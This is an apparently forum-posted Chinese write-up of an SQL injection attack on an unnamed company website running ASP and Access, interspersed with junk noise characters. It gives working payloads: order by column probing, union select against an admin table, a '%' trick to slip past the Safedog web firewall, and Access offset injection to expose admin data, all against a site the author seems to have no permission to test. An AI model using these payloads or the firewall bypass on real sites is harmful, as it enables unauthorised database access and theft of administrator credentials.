打开网站,一个企业站。
7 d0 }4 Q1 r' r# Q. ^4 j4 v9 z* _5 F& y
6 p/ D! {+ d% a; c. M5 F
顺手加个admin
. k8 U8 P6 _" d [1 a, M4 X Q+ h6 ?. J. B1 O. F4 T
( e/ q! g% u2 I8 ^4 \6 _默认后台。
/ C$ N! V! Z; F回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。. G4 ]4 e; z5 b$ u& ]' H
" G, c8 _5 n. r ?9 ?$ ]- A
* S0 R5 i- A# ^/ T4 U
- T5 b2 V5 M5 d- X0 U# s
所以就不用御剑扫了,待会直接封IP。9 x3 e) F" C0 E% |
. ^, I" [' s8 Z
用order by语句判断是否存在注入。2 s. I0 t: W2 g: A" k
http://www.xxx.com /product_show.asp?id=997 order by 1
: a5 B+ f( i3 k9 `$ G) E G! _http://www.xxx.com /product_show.asp?id=997 order by 100
6 X$ M/ v, l1 H1 ~现在存在注入,经测试后发现是9个字段。. [# o9 e6 R1 t% `/ X6 F2 w
; u: J- o9 h) A9 U, Q接下来进行联合查询,猜是否存在admin表。2 K9 a7 L( C/ d8 w
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。) ^5 `6 A5 a7 n' c; u
/ }& ]; ]7 M1 ~2 U/ _
, K6 f' d6 d7 j- Y) {' J
- R/ T" p/ O8 R; y$ j- ~在select中间加个%,se%lect绕过安全狗。# F" @3 c' _; k5 T8 q$ E4 m
2 \/ B7 O6 K1 Z3 g* E
5 \. e- v- R2 O! V, }发现存在admin表,然后开始手工猜常用的字段。
2 \! @1 N, W( e6 T8 n j% ?9 I. E纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。/ U8 H% d" c' @4 F# g0 `
2 K! C# V' F$ H. z& z
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。% U. F( f2 _* w
1 o0 v4 X& j# p0 o9 L/ m0 w2 U P" j科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。! o9 o4 |) U" D
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
3 E; Q: k. M- `( n6 O好了,敏感内容出显了。. P: d; t/ }0 `, n* m7 q/ K% x: Z
' s' T8 h& h% m+ w: A+ }
' m" ~9 q$ c; v3 u
2 y" C0 H6 c1 x' l0 a: ~/ e, S) w |